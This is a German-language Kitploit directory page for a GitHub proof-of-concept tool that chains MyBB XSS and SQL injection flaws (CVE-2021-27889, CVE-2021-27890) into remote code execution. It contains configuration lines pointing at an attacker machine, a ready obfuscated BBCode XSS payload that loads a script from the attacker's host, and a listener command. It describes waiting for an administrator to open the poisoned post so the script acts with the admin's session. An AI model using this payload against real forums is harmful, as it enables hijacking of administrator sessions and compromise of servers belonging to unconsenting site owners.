Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Mybb-XSS_SQL_RCE-POC — Mybb assoziiert CVE-2021-27890 & CVE-2021-27889 mit RCE-poc. | Kitploit
Tools/GitHubGitHub/xiaopan233/mybb-xss_sql_rce-poc
Payload-GenerierungExploitationWebanwendungs-Exploitation
GitHubxiaopan233/mybb-xss_sql_rce-poc

Mybb-XSS_SQL_RCE-POC

Mybb assoziiert CVE-2021-27890 & CVE-2021-27889 mit RCE-poc.

Repository anzeigen
102vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Mybb-XSS_SQL_RCE-POC

Mybb verknüpft CVE-2021-27890 & CVE-2021-27889 mit dem RCE-PoC

Vor der Verwendung:

Hier gibt es zwei Dateien: 1.js und attack_listen.py

Sie sollten diese beiden Dateien ändern:

1.js:

Ändern Sie die MyBB-Forum-URL und die Angriffs-URL:

root@kitploit:~
var bashurl = 'http://192.168.92.164/mybb/mybb-mybb_1825' #mybb forum url
var attack_url = 'http://192.168.92.165:8080/attack_success' #change the attack machine ip.should keep the same with the attack_listen.py

attack_listen.py

Ändern Sie den Angriffs-Host und den Angriffs-Port:

root@kitploit:~
attack_host = '192.168.92.165'
attack_port = 8080

Verwendung:

CVE-2021-27889 ist XSS. Sie sollten den folgenden Payload in "New Post Thread" oder "Reply" oder "Private Messages" injizieren, bevor Sie den Angriff durchführen. In dieser Demo sende ich den Payload an "New Post Thread".

Beachten Sie, dass 192.168.92.165 die IP des bösartigen Servers ist. Sie sollten sie ändern.

root@kitploit:~
[img]http://evil.com/xx(http://evil.com/onerror=xs1=String.fromCharCode(47);xa1=document.createElement(/script/.source);xa1.src=xs1+xs1+/192.168.92.165/.source+xs1+/1.js/.source;document.getElementById(/header/.source).append(xa1);//[/img]


Nun wurde unser bösartiges JS 1.js erfolgreich injiziert. Dann sollten wir warten, bis ein Admin diesen Beitrag mit dem Cookie der angemeldeten Admin-Seite besucht.

Beachten Sie, dass der Admin-Benutzer nicht zwingend auf der Forumsseite angemeldet sein muss.


Während wir warten, sollten wir das "attack_listen.py" auf unserer Angriffsmaschine ausführen, um festzustellen, ob der Admin-Benutzer angegriffen wird.

root@kitploit:~
python3 attack_listen.py

Wenn der Admin-Benutzer den bösartigen Beitrag aufruft, führt das bösartige JS den Angriff aus:


Wir können die Informationen auf unserer Angriffsmaschine empfangen:

Tool herunterladen